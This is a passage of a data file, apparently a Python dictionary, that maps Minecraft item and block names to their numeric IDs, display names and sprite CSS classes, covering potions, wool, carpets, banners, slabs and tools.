'345'}, 'quartz': {'0': {'class': 'at5 at5_46', 'name': 'Nether Quartz'}, 'ID': '406'}, 'leather_chestplate': {'0': {'class': 'at3 at_64', 'name': 'Leather Chestplate'}, 'ID': '299'}, 'diamond_chestplate': {'0': {'class': 'at3 at_76', 'name': 'Diamond Chestplate'}, 'ID': '311'}, 'record_11': {'0': {'class': 'at5 at5_96', 'name': 'Music Disk (11)'}, 'ID': '2266'}, 'end_stone': {'0': {'class': 'at1 at_90', 'name': 'End Stone'}, 'ID': '121'}, 'piston_head': {'0': {'class': 'at0 at_59', 'name': 'Piston (Head)'}, 'ID': '34'}, 'potion': {'16428': {'class': 'at4 at_80', 
'name': 'Harming Splash II'}, '16387': {'class': 'at4 at_73', 'name': 'Fire Resistance Splash (2:15)'}, '16452': {'class': 'at4 at_74', 'name': 'Poison Splash (1:30)'}, '16420': {'class': 'at4 at_74', 'name': 'Poison Splash II (0:16)'}, '8198': {'class': 'at4 at_63', 'name': 'Night Vision Potion (3:00)'}, '8297': {'class': 'at4 at_65', 'name': 'Strength Potion II (4:00)'}, '8204': {'class': 'at4 at_67', 'name': 'Harming Potion'}, '8233': {'class': 'at4 at_65', 'name': 'Strength Potion II (1:30)'}, '16457': {'class': 'at4 at_78', 'name': 'Strength Splash (6:00)'}, '8260': {'class': 'at4 at_61', 'name': 'Poison Potion (2:00)'}, '16450': {'class': 'at4 at_72', 'name': 'Swiftness Splash (6:00)'}, '8267': {'class': 'at4 at_70', 'name': 'Leaping Potion (3:00)'}, '8236': {'class': 'at4 at_67', 'name': 'Harming Potion II'}, '16459': {'class': 'at4 at_83', 'name': 'Leaping Splash (2:15)'}, '8195': {'class': 'at4 at_60', 'name': 'Fire Resistance Potion (3:00)'}, '8258': {'class': 'at4 at_59', 'name': 'Swiftness Potion (8:00)'}, '16462': {'class': 'at4 at_82', 'name': 'Invisibility Splash (6:00)'}, '16393': {'class': 'at4 at_78', 'name': 'Strength Splash (2:15)'}, '16': {'class': 'at4 at_57', 'name': 'Awkward Potion'}, '8292': {'class': 'at4 at_61', 'name': 'Poison Potion II (1:00)'}, '16386': {'class': 'at4 at_72', 'name': 'Swiftness Splash (2:15)'}, '8201': {'class': 'at4 at_65', 'name': 'Strength Potion (3:00)'}, '16489': {'class': 'at4 at_78', 'name': 'Strength Splash II (3:00)'}, '16481': {'class': 'at4 at_71', 'name': 'Regeneration Splash II (0:45)'}, '8202': {'class': 'at4 at_66', 'name': 'Slowness Potion (1:30)'}, '16397': {'class': 'at4 at_81', 'name': 'Breathing Splash (2:15)'}, '16425': {'class': 'at4 at_78', 'name': 'Strength Splash II (1:07)'}, '16388': {'class': 'at4 at_74', 'name': 'Poison Splash (0:33)'}, '8259': {'class': 'at4 at_60', 'name': 'Fire Resistance Potion (8:00)'}, '8197': {'class': 'at4 at_62', 'name': 'Healing Potion'}, '16484': {'class': 'at4 
at_74', 'name': 'Poison Splash II (0:45)'}, '16454': {'class': 'at4 at_76', 'name': 'Night Vision Splash (6:00)'}, '8205': {'class': 'at4 at_68', 'name': 'Water Breathing Potion (3:00)'}, '16394': {'class': 'at4 at_79', 'name': 'Slowness Splash (1:07)'}, '16482': {'class': 'at4 at_72', 'name': 'Swiftness Splash II (3:00)'}, '32': {'class': 'at4 at_57', 'name': 'Thick Potion'}, '16417': {'class': 'at4 at_71', 'name': 'Regeneration Splash II (0:16)'}, '16456': {'class': 'at4 at_77', 'name': 'Weakness Splash (3:00)'}, '8290': {'class': 'at4 at_59', 'name': 'Swiftness Potion II (4:00)'}, '8206': {'class': 'at4 at_69', 'name': 'Invisibility Potion (3:00)'}, '16385': {'class': 'at4 at_71', 'name': 'Regeneration Splash (0:33)'}, '8264': {'class': 'at4 at_64', 'name': 'Weakness Potion (4:00)'}, '8269': {'class': 'at4 at_68', 'name': 'Water Breathing Potion (8:00)'}, '8229': {'class': 'at4 at_62', 'name': 'Healing Potion II'}, '8262': {'class': 'at4 at_63', 'name': 'Night Vision Potion (8:00)'}, '16451': {'class': 'at4 at_73', 'name': 'Fire Resistance Splash (6:00)'}, '16427': {'class': 'at4 at_83', 'name': 'Leaping Splash II (1:07)'}, '8226': {'class': 'at4 at_59', 'name': 'Swiftness Potion II (1:30)'}, '8270': {'class': 'at4 at_69', 'name': 'Invisibility Potion (8:00)'}, '8194': {'class': 'at4 at_59', 'name': 'Swiftness Potion (3:00)'}, '8235': {'class': 'at4 at_70', 'name': 'Leaping Potion II (1:30)'}, '8289': {'class': 'at4 at_58', 'name': 'Regeneration Potion II (1:00)'}, '16458': {'class': 'at4 at_79', 'name': 'Slowness Splash (3:00)'}, '8265': {'class': 'at4 at_65', 'name': 'Strength Potion (8:00)'}, '16390': {'class': 'at4 at_76', 'name': 'Night Vision Splash (2:15)'}, '8266': {'class': 'at4 at_66', 'name': 'Slowness Potion (4:00)'}, '64': {'class': 'at4 at_57', 'name': 'Mundane Potion'}, '16398': {'class': 'at4 at_82', 'name': 'Invisibility Splash (2:15)'}, '16449': {'class': 'at4 at_71', 'name': 'Regeneration Splash (1:30)'}, '16421': {'class': 'at4 at_75', 
'name': 'Healing Splash II'}, '0': {'class': 'at4 at_57', 'name': 'Water Bottle'}, '8193': {'class': 'at4 at_58', 'name': 'Regeneration Potion (0:45)'}, '16461': {'class': 'at4 at_81', 'name': 'Breathing Splash (6:00)'}, '8196': {'class': 'at4 at_61', 'name': 'Poison Potion (0:45)'}, '8257': {'class': 'at4 at_58', 'name': 'Regeneration Potion (2:00)'}, '8200': {'class': 'at4 at_64', 'name': 'Weakness Potion (1:30)'}, '8225': {'class': 'at4 at_58', 'name': 'Regeneration Potion II (0:22)'}, 'ID': '373:16489', '16392': {'class': 'at4 at_77', 'name': 'Weakness Splash (1:07)'}, '16389': {'class': 'at4 at_75', 'name': 'Healing Splash'}, '8228': {'class': 'at4 at_61', 'name': 'Poison Potion II (0:22)'}, '16396': {'class': 'at4 at_80', 'name': 'Harming Splash'}, '16418': {'class': 'at4 at_72', 'name': 'Swiftness Splash II (1:07)'}}, 'wooden_slab': {'5': {'class': 'at2 at_1', 'name': 'Dark Oak Wood Slab'}, '2': {'class': 'at1 at_98', 'name': 'Birch-Wood Slab'}, '0': {'class': 'at1 at_96', 'name': 'Oak-Wood Slab'}, '3': {'class': 'at1 at_99', 'name': 'Jungle-Wood Slab'}, '4': {'class': 'at2', 'name': 'Acacia Wood Slab'}, '1': {'class': 'at1 at_97', 'name': 'Spruce-Wood Slab'}, 'ID': '126:5'}, 'fermented_spider_eye': {'0': {'class': 'at4 at_86', 'name': 'Fermented Spider Eye'}, 'ID': '376'}, 'rabbit': {'0': {'class': 'at5 at5_51', 'name': 'Raw Rabbit'}, 'ID': '411'}, 'melon_block': {'0': {'class': 'at1 at_73', 'name': 'Melon (Block)'}, 'ID': '103'}, 'portal': {'0': {'class': 'at1 at_44', 'name': 'Portal'}, 'ID': '90'}, 'boat': {'0': {'class': 'at3 at_98', 'name': 'Boat'}, 'ID': '333'}, 'magma_cream': {'0': {'class': 'at4 at_88', 'name': 'Magma Cream'}, 'ID': '378'}, 'flowing_water': {'0': {'class': 'at0 at_21', 'name': 'Water'}, 'ID': '8'}, 'air': {'0': {'class': '', 'name': 'No item'}, 'ID': '0'}, 'packed_ice': {'0': {'class': 'at2 at_98', 'name': 'Packed Ice'}, 'ID': '174'}, 'cobblestone': {'0': {'class': 'at0 at_10', 'name': 'Cobblestone'}, 'ID': '4'}, 'firework_charge': 
{'0': {'class': 'at5 at5_42', 'name': 'Firework Star'}, 'ID': '402'}, 'wall_banner': {'0': {'class': '', 'name': 'Wall Banner (Block)'}, 'ID': '177'}, 'brown_mushroom': {'0': {'class': 'at0 at_86', 'name': 'Brown Mushroom'}, 'ID': '39'}, 'reeds': {'0': {'class': 'at4 at_3', 'name': 'Sugar Cane'}, 'ID': '338'}, 'dropper': {'0': {'class': 'at2 at_33', 'name': 'Dropper'}, 'ID': '158'}, 'beacon': {'0': {'class': 'at2 at_13', 'name': 'Beacon'}, 'ID': '138'}, 'carrot': {'0': {'class': 'at5 at5_27', 'name': 'Carrot'}, 'ID': '391'}, 'red_mushroom_block': {'0': {'class': 'at1 at_70', 'name': 'Red Mushroom (Block)'}, 'ID': '100'}, 'potatoes': {'0': {'class': 'at2 at_18', 'name': 'Potatoes (Crop)'}, 'ID': '142'}, 'wooden_sword': {'0': {'class': 'at3 at_33', 'name': 'Wooden Sword'}, 'ID': '268'}, 'stonebrick': {'1': {'class': 'at1 at_67', 'name': 'Mossy Stone Bricks'}, '0': {'class': 'at1 at_66', 'name': 'Stone Bricks'}, 'ID': '98:3', '3': {'class': 'at1 at_69', 'name': 'Chiseled Stone Brick'}, '2': {'class': 'at1 at_68', 'name': 'Cracked Stone Bricks'}}, 'slimeball': {'0': {'class': 'at4 at_6', 'name': 'Slime Ball'}, 'ID': '341'}, 'planks': {'5': {'class': 'at1 at_95', 'name': 'Wooden Plank (Dark Oak)'}, '2': {'class': 'at0 at_12', 'name': 'Wooden Plank (Birch)'}, '0': {'class': 'at0 at_11', 'name': 'Wooden Plank (Oak)'}, '3': {'class': 'at0 at_13', 'name': 'Wooden Plank (Jungle)'}, '4': {'class': 'at1 at_94', 'name': 'Wooden Plank (Acacia)'}, '1': {'class': 'at0 at_22', 'name': 'Wooden Plank (Spruce)'}, 'ID': '5:5'}, 'flint': {'0': {'class': 'at3 at_83', 'name': 'Flint'}, 'ID': '318'}, 'apple': {'0': {'class': 'at3 at_24', 'name': 'Apple'}, 'ID': '260'}, 'wooden_button': {'0': {'class': 'at2 at_19', 'name': 'Button (Wood)'}, 'ID': '143'}, 'stone_axe': {'0': {'class': 'at3 at_40', 'name': 'Stone Axe'}, 'ID': '275'}, 'quartz_block': {'1': {'class': 'at2 at_29', 'name': 'Chiseled Quartz Block'}, '0': {'class': 'at2 at_28', 'name': 'Quartz Block'}, 'ID': '155:2', '2': {'class': 
'at2 at_30', 'name': 'Pillar Quartz Block'}}, 'cooked_porkchop': {'0': {'class': 'at3 at_85', 'name': 'Cooked Porkchop'}, 'ID': '320'}, 'jungle_stairs': {'0': {'class': 'at2 at_11', 'name': 'Wooden Stairs (Jungle)'}, 'ID': '136'}, 'tnt_minecart': {'0': {'class': 'at5 at5_47', 'name': 'Minecart (TNT)'}, 'ID': '407'}, 'birch_fence_gate': {'0': {'class': 'at3 at_11', 'name': 'Fence Gate (Birch)'}, 'ID': '184'}, 'wooden_shovel': {'0': {'class': 'at3 at_34', 'name': 'Wooden Shovel'}, 'ID': '269'}, 'snow_layer': {'0': {'class': 'at1 at_32', 'name': 'Snow'}, 'ID': '78'}, 'spider_eye': {'0': {'class': 'at4 at_85', 'name': 'Spider Eye'}, 'ID': '375'}, 'ender_pearl': {'0': {'class': 'at4 at_52', 'name': 'Ender Pearl'}, 'ID': '368'}, 'lapis_block': {'0': {'class': 'at0 at_44', 'name': 'Lapis Lazuli Block'}, 'ID': '22'}, 'iron_ore': {'0': {'class': 'at0 at_28', 'name': 'Iron Ore'}, 'ID': '15'}, 'leaves': {'1': {'class': 'at0 at_37', 'name': 'Leaves (Spruce)'}, '0': {'class': 'at0 at_36', 'name': 'Leaves (Oak)'}, 'ID': '18:3', '3': {'class': 'at0 at_39', 'name': 'Leaves (Jungle)'}, '2': {'class': 'at0 at_38', 'name': 'Leaves (Birch)'}}, 'chainmail_helmet': {'0': {'class': 'at3 at_67', 'name': 'Chainmail Helmet'}, 'ID': '302'}, 'lead': {'0': {'class': 'at5 at5_60', 'name': 'Lead'}, 'ID': '420'}, 'record_ward': {'0': {'class': 'at5 at5_95', 'name': 'Music Disk (Ward)'}, 'ID': '2265'}, 'redstone_torch': {'0': {'class': 'at1 at_30', 'name': 'Redstone Torch'}, 'ID': '76'}, 'sponge': {'1': {'class': 'at0 at_41', 'name': 'Wet Sponge'}, '0': {'class': 'at0 at_40', 'name': 'Sponge'}, 'ID': '19:1'}, 'stained_glass_pane': {'2': {'class': 'at2 at_52', 'name': 'Stained Glass Pane (Magenta)'}, '0': {'class': 'at2 at_50', 'name': 'Stained Glass Pane (White)'}, '14': {'class': 'at2 at_64', 'name': 'Stained Glass Pane (Red)'}, '10': {'class': 'at2 at_60', 'name': 'Stained Glass Pane (Purple)'}, 'ID': '160:15', '12': {'class': 'at2 at_62', 'name': 'Stained Glass Pane (Brown)'}, '6': {'class': 
'at2 at_56', 'name': 'Stained Glass Pane (Pink)'}, '11': {'class': 'at2 at_61', 'name': 'Stained Glass Pane (Blue)'}, '7': {'class': 'at2 at_57', 'name': 'Stained Glass Pane (Gray)'}, '5': {'class': 'at2 at_55', 'name': 'Stained Glass Pane (Lime)'}, '13': {'class': 'at2 at_63', 'name': 'Stained Glass Pane (Green)'}, '3': {'class': 'at2 at_53', 'name': 'Stained Glass Pane (Light Blue)'}, '8': {'class': 'at2 at_58', 'name': 'Stained Glass Pane (Light Gray)'}, '4': {'class': 'at2 at_54', 'name': 'Stained Glass Pane (Yellow)'}, '15': {'class': 'at2 at_65', 'name': 'Stained Glass Pane (Black)'}, '1': {'class': 'at2 at_51', 'name': 'Stained Glass Pane (Orange)'}, '9': {'class': 'at2 at_59', 'name': 'Stained Glass Pane (Cyan)'}}, 'piston': {'0': {'class': 'at0 at_58', 'name': 'Piston'}, 'ID': '33'}, 'iron_hoe': {'0': {'class': 'at3 at_57', 'name': 'Iron Hoe'}, 'ID': '292'}, 'wool': {'2': {'class': 'at0 at_62', 'name': 'Magenta Wool'}, '0': {'class': 'at0 at_60', 'name': 'Wool'}, '14': {'class': 'at0 at_74', 'name': 'Red Wool'}, '10': {'class': 'at0 at_70', 'name': 'Purple Wool'}, 'ID': '35:15', '12': {'class': 'at0 at_72', 'name': 'Brown Wool'}, '6': {'class': 'at0 at_66', 'name': 'Pink Wool'}, '11': {'class': 'at0 at_71', 'name': 'Blue Wool'}, '7': {'class': 'at0 at_67', 'name': 'Gray Wool'}, '5': {'class': 'at0 at_65', 'name': 'Lime Wool'}, '13': {'class': 'at0 at_73', 'name': 'Green Wool'}, '3': {'class': 'at0 at_63', 'name': 'Light Blue Wool'}, '8': {'class': 'at0 at_68', 'name': 'Light Gray Wool'}, '4': {'class': 'at0 at_64', 'name': 'Yellow Wool'}, '15': {'class': 'at0 at_75', 'name': 'Black Wool'}, '1': {'class': 'at0 at_61', 'name': 'Orange Wool'}, '9': {'class': 'at0 at_69', 'name': 'Cyan Wool'}}, 'banner': {'2': {'class': 'at5 at5_67', 'name': 'Banner (Green)'}, '0': {'class': 'at5 at5_65', 'name': 'Banner (Black)'}, '14': {'class': 'at5 at5_79', 'name': 'Banner (Orange)'}, '10': {'class': 'at5 at5_75', 'name': 'Banner (Lime)'}, 'ID': '425:15', '12': {'class': 
'at5 at5_77', 'name': 'Banner (Light Blue)'}, '6': {'class': 'at5 at5_71', 'name': 'Banner (Cyan)'}, '11': {'class': 'at5 at5_76', 'name': 'Banner (Yellow)'}, '7': {'class': 'at5 at5_72', 'name': 'Banner (Light Gray)'}, '5': {'class': 'at5 at5_70', 'name': 'Banner (Purple)'}, '13': {'class': 'at5 at5_78', 'name': 'Banner (Magenta)'}, '3': {'class': 'at5 at5_68', 'name': 'Banner (Brown)'}, '8': {'class': 'at5 at5_73', 'name': 'Banner (Gray)'}, '4': {'class': 'at5 at5_69', 'name': 'Banner (Blue)'}, '15': {'class': 'at5 at5_80', 'name': 'Banner (White)'}, '1': {'class': 'at5 at5_66', 'name': 'Banner (Red)'}, '9': {'class': 'at5 at5_74', 'name': 'Banner (Pink)'}}, 'standing_banner': {'0': {'class': '', 'name': 'Standing Banner (Block)'}, 'ID': '176'}, 'iron_shovel': {'0': {'class': 'at3 at_20', 'name': 'Iron Shovel'}, 'ID': '256'}, 'ladder': {'0': {'class': 'at1 at_20', 'name': 'Ladder'}, 'ID': '65'}, 'redstone_ore': {'0': {'class': 'at1 at_27', 'name': 'Redstone Ore'}, 'ID': '73'}, 'spruce_door': {'0': {'class': 'at5 at5_81', 'name': 'Wooden Door (Spruce)'}, 'ID': '427'}, 'waterlily': {'0': {'class': 'at1 at_80', 'name': 'Lily Pad'}, 'ID': '111'}, 'jungle_fence': {'0': {'class': 'at3 at_17', 'name': 'Fence (Jungle)'}, 'ID': '190'}, 'enchanting_table': {'0': {'class': 'at1 at_85', 'name': 'Enchantment Table'}, 'ID': '116'}, 'unpowered_repeater': {'0': {'class': 'at1 at_47', 'name': 'Redstone Repeater (Block Off)'}, 'ID': '93'}, 'nether_brick_fence': {'0': {'class': 'at1 at_82', 'name': 'Nether Brick Fence'}, 'ID': '113'}, 'diamond_ore': {'0': {'class': 'at1 at_12', 'name': 'Diamond Ore'}, 'ID': '56'}, 'writable_book': {'0': {'class': 'at5 at5_22', 'name': 'Book and Quill'}, 'ID': '386'}, 'stone_pickaxe': {'0': {'class': 'at3 at_39', 'name': 'Stone Pickaxe'}, 'ID': '274'}, 'dispenser': {'0': {'class': 'at0 at_45', 'name': 'Dispenser'}, 'ID': '23'}, 'spruce_fence': {'0': {'class': 'at3 at_15', 'name': 'Fence (Spruce)'}, 'ID': '188'}, 'furnace': {'0': {'class': 'at1 
at_17', 'name': 'Furnace'}, 'ID': '61'}, 'quartz_stairs': {'0': {'class': 'at2 at_31', 'name': 'Quartz Stairs'}, 'ID': '156'}, 'shears': {'0': {'class': 'at4 at_43', 'name': 'Shears'}, 'ID': '359'}, 'carpet': {'2': {'class': 'at2 at_82', 'name': 'Carpet (Magenta)'}, '0': {'class': 'at2 at_80', 'name': 'Carpet (White)'}, '14': {'class': 'at2 at_94', 'name': 'Carpet (Red)'}, '10': {'class': 'at2 at_90', 'name': 'Carpet (Purple)'}, 'ID': '171:15', '12': {'class': 'at2 at_92', 'name': 'Carpet (Brown)'}, '6': {'class': 'at2 at_86', 'name': 'Carpet (Pink)'}, '11': {'class': 'at2 at_91', 'name': 'Carpet (Blue)'}, '7': {'class': 'at2 at_87', 'name': 'Carpet (Grey)'}, '5': {'class': 'at2 at_85', 'name': 'Carpet (Lime)'}, '13': {'class': 'at2 at_93', 'name': 'Carpet (Green)'}, '3': {'class': 'at2 at_83', 'name': 'Carpet (Light Blue)'}, '8': {'class': 'at2 at_88', 'name': 'Carpet (Light Gray)'}, '4': {'class': 'at2 at_84', 'name': 'Carpet (Yellow)'}, '15': {'class': 'at2 at_95', 'name': 'Carpet (Black)'}, '1': {'class': 'at2 at_81', 'name': 'Carpet (Orange)'}, '9': {'class': 'at2 at_89', 'name': 'Carpet (Cyan)'}}, 'end_portal': {'0': {'class': 'at1 at_88', 'name': 'End Portal'}, 'ID': '119'}, 'netherrack': {'0': {'class': 'at1 at_41', 'name': 'Netherrack'}, 'ID': '87'}, 'record_mall': {'0': {'class': 'at5 at5_91', 'name': 'Music Disk (Mall)'}, 'ID': '2261'}, 'cooked_chicken': {'0': {'class': 'at4 at_50', 'name': 'Cooked Chicken'}, 'ID': '366'}, 'web': {'0': {'class': 'at0 at_54', 'name': 'Cobweb'}, 'ID': '30'}, 'snowball': {'0': {'class': 'at3 at_97', 'name': 'Snowball'}, 'ID': '332'}, 'powered_comparator': {'0': {'class': 'at5 at5_44', 'name': 'Redstone Comparator (On)'}, 'ID': '150'}, 'melon_seeds': {'0': {'class': 'at4 at_46', 'name': 'Melon Seeds'}, 'ID': '362'}, 'barrier': {'0': {'class': 'at2 at_73', 'name': 'Barrier'}, 'ID': '166'}, 'heavy_weighted_pressure_plate': {'0': {'class': 'at2 at_23', 'name': 'Weighted Pressure Plate (Heavy)'}, 'ID': '148'}, 
'double_stone_slab': {'7': {'class': 'at2 at_28', 'name': 'Quartz Slab (Double)'}, '5': {'class': 'at1 at_66', 'name': 'Stone Brick Slab (Double)'}, '2': {'class': 'at0 at_11', 'name': 'Wooden Slab (Double)'}, '0': {'class': 'at0 at_90', 'name': 'Stone Slab (Double)'}, '3': {'class': 'at0 at_10', 'name': 'Cobblestone Slab (Double)'}, '8': {'class': 'at0 at_91', 'name': 'Smooth Stone Slab (Double)'}, '4': {'class': 'at1 at_1', 'name': 'Brick Slab (Double)'}, '1': {'class': 'at0 at_46', 'name': 'Sandstone Slab (Double)'}, '9': {'class': 'at0 at_92', 'name': 'Smooth Sandstone Slab (Double)'}, 'ID': '43:9', '6': {'class': 'at1 at_81', 'name': 'Nether Brick Slab (Double)'}}, 'spruce_stairs': {'0': {'class': 'at2 at_9', 'name': 'Wooden Stairs (Spruce)'}, 'ID': '134'}, 'golden_shovel': {'0': {'class': 'at3 at_49', 'name': 'Gold Shovel'}, 'ID': '284'}, 'trapped_chest': {'0': {'class': 'at2 at_21', 'name': 'Trapped Chest'}, 'ID': '146'}, 'repeater': {'0': {'class': 'at4 at_40', 'name': 'Redstone Repeater'}, 'ID': '356'}, 'coal': {'1': {'class': 'at3 at_28', 'name': 'Charcoal'}, '0': {'class': 'at3 at_27', 'name': 'Coal'}, 'ID': '263:1'}, 'rabbit_foot': {'0': {'class': 'at5 at5_54', 'name': "Rabbit's Foot"}, 'ID': '414'}, 'minecart': {'0': {'class': 'at3 at_93', 'name': 'Minecart'}, 'ID': '328'}, 'mob_spawner': {'0': {'class': 'at1 at_8', 'name': 'Mob Spawner'}, 'ID': '52'}, 'chest_minecart': {'0': {'class': 'at4 at_7', 'name': 'Minecart (Storage)'}, 'ID': '342'}, 'golden_helmet': {'0': {'class': 'at3 at_79', 'name': 'Gold Helmet'}, 'ID': '314'}, 'golden_carrot': {'0': {'class': 'at5 at5_32', 'name': 'Golden Carrot'}, 'ID': '396'}, 'red_sandstone': {'1': {'class': 'at3 at_6', 'name': 'Red Sandstone (Chiseled)'}, '0': {'class': 'at3 at_5', 'name': 'Red Sandstone'}, 'ID': '179:2', '2': {'class': 'at3 at_7', 'name': 'Red Sandstone (Smooth)'}}, 'ice': {'0': {'class': 'at1 at_33', 'name': 'Ice'}, 'ID': '79'}, 'end_portal_frame': {'0': {'class': 'at1 at_89', 'name': 'End Portal 
Frame'}, 'ID': '120'}, 'comparator': {'0': {'class': 'at5 at5_44', 'name': 'Redstone Comparator'}, 'ID': '404'}, 'birch_fence': {'0': {'class': 'at3 at_16', 'name': 'Fence (Birch)'}, 'ID': '189'}, 'activator_rail': {'0': {'class': 'at2 at_32', 'name': 'Rail (Activator)'}, 'ID': '157'}, 'cactus': {'0': {'class': 'at1 at_35', 'name': 'Cactus'}, 'ID': '81'}, 'double_stone_slab2': {'0': {'class': 'at3 at_5', 'name': 'Red Sandstone Slab (Double)'}, 'ID': '181'}, 'chicken': {'0': {'class': 'at4 at_49', 'name': 'Raw Chicken'}, 'ID': '365'}, 'tripwire': {'0': {'class': 'at2 at_7', 'name': 'Tripwire'}, 'ID': '132'}, 'emerald_block': {'0': {'class': 'at2 at_8', 'name': 'Block of Emerald'}, 'ID': '133'}, 'record_chirp': {'0': {'class': 'at5 at5_89', 'name': 'Music Disk (Chirp)'}, 'ID': '2259'}, 'feather': {'0': {'class': 'at3 at_53', 'name': 'Feather'}, 'ID': '288'}, 'porkchop': {'0': {'class': 'at3 at_84', 'name': 'Raw Porkchop'}, 'ID': '319'}, 'wheat': {'0': {'class': 'at3 at_61', 'name': 'Wheat'}, 'ID': '296'}, 'acacia_stairs': {'0': {'class': 'at2 at_70', 'name': 'Wooden Stairs (Acacia)'}, 'ID': '163'}, 'golden_boots': {'0': {'class': 'at3 at_82', 'name': 'Gold Boots'}, 'ID': '317'}, 'iron_helmet': {'0': {'class': 'at3 at_71', 'name': 'Iron Helmet'}, 'ID': '306'}, 'diamond_axe': {'0': {'class': 'at3 at_44', 'name': 'Diamond Axe'}, 'ID': '279'}, 'brown_mushroom_block': {'0': {'class': 'at1 at_70', 'name': 'Brown Mushroom (Block)'}, 'ID': '99'}, 'pumpkin_seeds': {'0': {'class': 'at4 at_45', 'name': 'Pumpkin Seeds'}, 'ID': '361'}, 'brewing_stand': {'0': {'class': 'at4 at_89', 'name': 'Brewing Stand'}, 'ID': '379'}, 'netherbrick': {'0': {'class': 'at5 at5_45', 'name': 'Nether Brick (Item)'}, 'ID': '405'}, 'hay_block': {'0': {'class': 'at2 at_79', 'name': 'Hay Bale'}, 'ID': '170'}, 'nether_brick_stairs': {'0': {'class': 'at1 at_83', 'name': 'Nether Brick Stairs'}, 'ID': '114'}, 'dirt': {'1': {'class': 'at0 at_8', 'name': 'Coarse Dirt'}, '0': {'class': 'at0 at_8', 'name': 
'Dirt'}, 'ID': '3:2', '2': {'class': 'at0 at_9', 'name': 'Podzol'}}, 'prismarine_crystals': {'0': {'class': 'at5 at5_50', 'name': 'Prismarine Crystals'}, 'ID': '410'}, 'glowstone_dust': {'0': {'class': 'at4 at_13', 'name': 'Glowstone Dust'}, 'ID': '348'}, 'redstone_lamp': {'0': {'class': 'at1 at_92', 'name': 'Redstone Lamp'}, 'ID': '123'}, 'baked_potato': {'0': {'class': 'at5 at5_29', 'name': 'Baked Potato'}, 'ID': '393'}, 'gold_block': {'0': {'class': 'at0 at_88', 'name': 'Block of Gold'}, 'ID': '41'}, 'sapling': {'5': {'class': 'at0 at_19', 'name': 'Sapling (Dark Oak)'}, '2': {'class': 'at0 at_16', 'name': 'Sapling (Birch)'}, '0': {'class': 'at0 at_14', 'name': 'Sapling (Oak)'}, '3': {'class': 'at0 at_17', 'name': 'Sapling (Jungle)'}, '4': {'class': 'at0 at_18', 'name': 'Sapling (Acacia)'}, '1': {'class': 'at0 at_15', 'name': 'Sapling (Spruce)'}, 'ID': '6:5'}, 'piston_extension': {'0': {'class': '', 'name': 'Piston (Moving)'}, 'ID': '36'}, 'iron_axe': {'0': {'class': 'at3 at_22', 'name': 'Iron Axe'}, 'ID': '258'}, 'arrow': {'0': {'class': 'at3 at_26', 'name': 'Arrow'}, 'ID': '262'}, 'obsidian': {'0': {'class': 'at1 at_5', 'name': 'Obsidian'}, 'ID': '49'}, 'iron_chestplate': {'0': {'class': 'at3 at_72', 'name': 'Iron Chestplate'}, 'ID': '307'}, 'leather_helmet': {'0': {'class': 'at3 at_63', 'name': 'Leather Helmet'}, 'ID': '298'}, 'ghast_tear': {'0': {'class': 'at4 at_54', 'name': 'Ghast Tear'}, 'ID': '370'}, 'stone_slab': {'7': {'class': 'at1', 'name': 'Quartz Slab'}, '5': {'class': 'at0 at_98', 'name': 'Stone Brick Slab'}, '2': {'class': 'at0 at_95', 'name': 'Wooden Slab'}, '0': {'class': 'at0 at_93', 'name': 'Stone Slab'}, '3': {'class': 'at0 at_96', 'name': 'Cobblestone Slab'}, '4': {'class': 'at0 at_97', 'name': 'Brick Slab'}, '1': {'class': 'at0 at_94', 'name': 'Sandstone Slab'}, 'ID': '44:7', '6': {'class': 'at0 at_99', 'name': 'Nether Brick Slab'}}, 'golden_pickaxe': {'0': {'class': 'at3 at_50', 'name': 'Gold Pickaxe'}, 'ID': '285'}, 'record_cat': {'0': 
{'class': 'at5 at5_87', 'name': 'Music Disk (Cat)'}, 'ID': '2257'}, 'diamond_sword': {'0': {'class': 'at3 at_41', 'name': 'Diamond Sword'}, 'ID': '276'}, 'lit_redstone_lamp': {'0': {'class': 'at1 at_93', 'name': 'Redstone Lamp (On)'}, 'ID': '124'}, 'chainmail_leggings': {'0': {'class': 'at3 at_69', 'name': 'Chainmail Leggings'}, 'ID': '304'}, 'golden_hoe': {'0': {'class': 'at3 at_59', 'name': 'Gold Hoe'}, 'ID': '294'}, 'string': {'0': {'class': 'at3 at_52', 'name': 'String'}, 'ID': '287'}, 'diamond_block': {'0': {'class': 'at1 at_13', 'name': 'Block of Diamond'}, 'ID': '57'}, 'armor_stand': {'0': {'class': 'at5 at5_56', 'name': 'Armor Stand'}, 'ID': '416'}, 'yellow_flower': {'0': {'class': 'at0 at_76', 'name': 'Dandelion'}, 'ID': '37'}, 'clay': {'0': {'class': 'at1 at_36', 'name': 'Clay Block'}, 'ID': '82'}, 'water_bucket': {'0': {'class': 'at3 at_91', 'name': 'Bucket (Water)'}, 'ID': '326'}, 'cauldron': {'0': {'class': 'at4 at_90', 'name': 'Cauldron'}, 'ID': '380'}, 'ender_eye': {'0': {'class': 'at4 at_91', 'name': 'Eye of Ender'}, 'ID': '381'}, 'lit_pumpkin': {'0': {'class': 'at1 at_45', 'name': 'Jack-O-Lantern'}, 'ID': '91'}, 'gold_ore': {'0': {'class': 'at0 at_27', 'name': 'Gold Ore'}, 'ID': '14'}, 'redstone_block': {'0': {'class': 'at2 at_25', 'name': 'Block of Redstone'}, 'ID': '152'}, 'nether_wart': {'0': {'class': 'at4 at_56', 'name': 'Nether Wart Seeds'}, 'ID': '372'}, 'bookshelf': {'0': {'class': 'at1 at_3', 'name': 'Bookshelf'}, 'ID': '47'}, 'diamond_boots': {'0': {'class': 'at3 at_78', 'name': 'Diamond Boots'}, 'ID': '313'}, 'dragon_egg': {'0': {'class': 'at1 at_91', 'name': 'Dragon Egg'}, 'ID': '122'}, 'grass': {'0': {'class': 'at0 at_7', 'name': 'Grass'}, 'ID': '2'}, 'mushroom_stew': {'0': {'class': 'at3 at_47', 'name': 'Mushroom Stew'}, 'ID': '282'}, 'lit_furnace': {'0': {'class': 'at1 at_18', 'name': 'Furnace (Smelting)'}, 'ID': '62'}, 'lapis_ore': {'0': {'class': 'at0 at_43', 'name': 'Lapis Lazuli Ore'}, 'ID': '21'}, 'tripwire_hook': {'0': 
